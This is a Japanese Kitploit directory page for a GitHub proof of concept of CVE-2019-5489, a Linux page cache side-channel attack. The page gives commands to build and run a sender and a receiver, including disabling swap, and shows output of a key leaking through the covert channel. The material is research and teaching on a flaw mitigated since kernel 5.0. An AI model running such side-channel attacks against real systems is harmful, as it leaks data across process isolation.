Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-5489 — Linux向けPage Cacheサイドチャネル攻撃(CVE-2019-5489)の概念実証 | Kitploit
ツール/GitHubGitHub/mmxsrup/cve-2019-5489
脆弱性分析エクスプロイト情報収集論文と研究学習と教育バイナリエクスプロイト
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Linux向けPage Cacheサイドチャネル攻撃(CVE-2019-5489)の概念実証

リポジトリを見る
10324年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE 2019-5489

このリポジトリには、Linux向けのPage Cache Side Channel Attacks(CVE-2019-5489)の概念実証(PoC)が含まれています。

ページキャッシュサイドチャネルを評価するために、2つのプロセス間で**covert channel(隠れチャネル)**を実装しました。 送信プロセスは、ページキャッシュサイドチャネルを介して機密データを受信プロセスに送信します。 Linuxカーネル5.0以降ではページキャッシュ攻撃が緩和されているため、このPoCはLinuxカーネル5.0より前でのみ動作します。

注記: Ubuntu 18.04、Linux 4.15.0-70 で動作確認済みです。

ビルド

次のコマンドを実行してください。

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

実行

攻撃を容易にするためにスワップ領域を無効にします。

root@kitploit:~
swapoff -a

ターミナル 1

最初に、ターミナル 1 で次のコマンドを実行してください。

root@kitploit:~
make run-sender

ターミナル 2

ターミナル 1 に sending 1th character ... が出力された後、次のコマンドを実行してください。

root@kitploit:~
make run-receiver

出力

実行が成功すると、次のように出力されます。
これは、キーが Sender プロセスから Reciver プロセスへページキャッシュサイドチャネルを介して送信されたことを示しています。

ターミナル 1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

ターミナル 2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

参考文献

  • Daniel Gruss et al. Page cache attacks [CCS 19]
ツールをダウンロード